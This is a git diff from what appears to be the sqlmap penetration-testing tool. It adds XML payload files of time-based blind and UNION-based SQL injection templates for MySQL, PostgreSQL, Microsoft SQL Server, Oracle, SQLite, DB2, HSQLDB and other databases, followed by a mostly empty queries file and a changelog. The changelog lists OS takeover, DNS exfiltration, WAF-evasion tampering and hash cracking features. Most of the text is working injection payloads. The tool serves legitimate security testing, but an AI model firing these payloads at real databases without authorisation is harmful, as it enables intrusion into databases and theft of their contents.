+ + + PostgreSQL time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) + 5 + 4 + 2 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + + Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP) + 5 + 3 + 1 + 1,3,9 + 3 + BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE) + 5 + 3 + 1 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (heavy queries) + 5 + 4 + 2 + 1,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + SQLite > 2.0 time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)) + + (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,3,9 + 3 + (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + IBM DB2 time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + + HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 time-based blind - Parameter replace (heavy query) + 5 + 5 + 2 + 1,2,3,9 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0))) + + + + +
+ HSQLDB + > 2.0 +
+
+ + + Informix time-based blind - Parameter replace (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 3 + (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END) + + (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) + + + + +
+ Informix +
+
+ + + + + MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END)) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END)) + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP) + 5 + 3 + 1 + 2,3 + 1 + ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) + + ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE) + 5 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + + +
+ Oracle +
+
+ + + HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query) + 5 + 4 + 2 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0))) + + + + +
+ HSQLDB + > 2.0 +
+
+ + +
diff --git a/data/xml/payloads/union_query.xml b/data/xml/payloads/union_query.xml new file mode 100644 index 00000000000..9513892fafb --- /dev/null +++ b/data/xml/payloads/union_query.xml @@ -0,0 +1,742 @@ + + + + + + Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + + + + + Generic UNION query ([CHAR]) - 1 to 10 columns + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 1-10 + + + + + + + + Generic UNION query (NULL) - 1 to 10 columns + 6 + 1 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 1-10 + + + + + + + + Generic UNION query ([RANDNUM]) - 1 to 10 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 1-10 + + + + + + + + Generic UNION query ([CHAR]) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 11-20 + + + + + + + + Generic UNION query (NULL) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 11-20 + + + + + + + + Generic UNION query ([RANDNUM]) - 11 to 20 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 11-20 + + + + + + + + Generic UNION query ([CHAR]) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 21-30 + + + + + + + + Generic UNION query (NULL) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 21-30 + + + + + + + + Generic UNION query ([RANDNUM]) - 21 to 30 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 21-30 + + + + + + + + Generic UNION query ([CHAR]) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 31-40 + + + + + + + + Generic UNION query (NULL) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 31-40 + + + + + + + + Generic UNION query ([RANDNUM]) - 31 to 40 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 31-40 + + + + + + + + Generic UNION query ([CHAR]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [CHAR] + 41-50 + + + + + + + Generic UNION query (NULL) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + NULL + 41-50 + + + + + + + + Generic UNION query ([RANDNUM]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + [GENERIC_SQL_COMMENT] + [RANDNUM] + 41-50 + + + + + + + + MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom) + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + [COLSTART]-[COLSTOP] + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 1 to 10 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 1 to 10 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 1 to 10 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 1-10 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 11 to 20 columns + 6 + 2 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 11 to 20 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 11-20 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 21 to 30 columns + 6 + 3 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 21 to 30 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 21-30 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 31 to 40 columns + 6 + 4 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 31 to 40 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 31-40 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([CHAR]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [CHAR] + 41-50 + + + + +
+ MySQL +
+
+ + + MySQL UNION query (NULL) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + NULL + 41-50 + + + + +
+ MySQL +
+
+ + + MySQL UNION query ([RANDNUM]) - 41 to 50 columns + 6 + 5 + 1 + 1,2,3,4,5 + 1 + [UNION] + + + # + [RANDNUM] + 41-50 + + + + +
+ MySQL +
+
+ +
diff --git a/data/xml/queries.xml b/data/xml/queries.xml new file mode 100644 index 00000000000..5196459cc33 --- /dev/null +++ b/data/xml/queries.xml @@ -0,0 +1,1846 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/doc/AUTHORS b/doc/AUTHORS index d3758d676d3..300711a3a14 100644 --- a/doc/AUTHORS +++ b/doc/AUTHORS @@ -1,7 +1,7 @@ -Bernardo Damele Assumpcao Guimaraes (@inquisb) - - -Miroslav Stampar (@stamparm) - - -You can contact both developers by writing to dev@sqlmap.org +Bernardo Damele Assumpcao Guimaraes (@inquisb) + + +Miroslav Stampar (@stamparm) + + +You can contact both developers by writing to dev@sqlmap.org diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index e656280cc38..dada8fb47e0 100644 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,14 +1,62 @@ -# Version 1.0 (upcoming) +# Version 1.10 (2026-01-01) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.9...1.10) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/11?closed=1) + +# Version 1.9 (2025-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.8...1.9) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/10?closed=1) + +# Version 1.8 (2024-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.7...1.8) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/9?closed=1) + +# Version 1.7 (2023-01-02) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1) + +# Version 1.6 (2022-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1) + +# Version 1.5 (2021-01-03) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1) + +# Version 1.4 (2020-01-01) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1) + +# Version 1.3 (2019-01-05) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1) + +# Version 1.2 (2018-01-08) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1) + +# Version 1.1 (2017-04-07) + +* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1) +* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1) + +# Version 1.0 (2016-02-27) * Implemented support for automatic decoding of page content through detected charset. * Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). * Major improvements to program stabilization based on user reports. -* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. -* Added support for setting Tor proxy type together with port. +* Added new tampering scripts avoiding popular WAF/IPS mechanisms. * Fixed major bug with DNS leaking in Tor mode. * Added wordlist compilation made of the most popular cracking dictionaries. -* Added support for mnemonics substantially helping user with program setup. -* Implemented multi-processor hash cracking routine(s) on Linux OS. +* Implemented multi-processor hash cracking routine(s). * Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. * Old resume files are now deprecated and replaced by faster SQLite based session mechanism. * Substantial code optimization and smaller memory footprint. @@ -25,12 +73,75 @@ * Added option `--csv-del` for manually setting delimiting character used in CSV output. * Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. * Added switch `--smart` for conducting through tests only in case of positive heuristic(s). -* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. +* Added switch `--check-waf` for checking of existence of WAF/IPS protection. * Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. * Added switch `--count` to count the number of entries for a specific table or all database(s) tables. -* Major improvements to switches --tables and --columns. -* Takeover switch --os-pwn improved: stealthier, faster and AV-proof. -* Added switch --mobile to imitate a mobile device through HTTP User-Agent header. +* Major improvements to switches `--tables` and `--columns`. +* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. +* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. +* Added switch `-a` to enumerate all DBMS data. +* Added option `--alert` to run host OS command(s) when SQL injection is found. +* Added option `--answers` to set user answers to asked questions during sqlmap run. +* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. +* Added option `--charset` to force character encoding used during data retrieval. +* Added switch `--check-tor` to force checking of proper usage of Tor. +* Added option `--code` to set HTTP code to match when query is evaluated to True. +* Added option `--cookie-del` to set character to be used while splitting cookie values. +* Added option `--crawl` to set the crawling depth for the website starting from the target URL. +* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). +* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. +* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. +* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). +* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). +* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. +* Added switch `--disable-coloring` to disable console output coloring. +* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). +* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). +* Added option `--eval` for setting the Python code that will be evaluated before the request. +* Added switch `--force-ssl` to force usage of SSL/HTTPS. +* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. +* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). +* Added switch `-hh` for showing advanced help 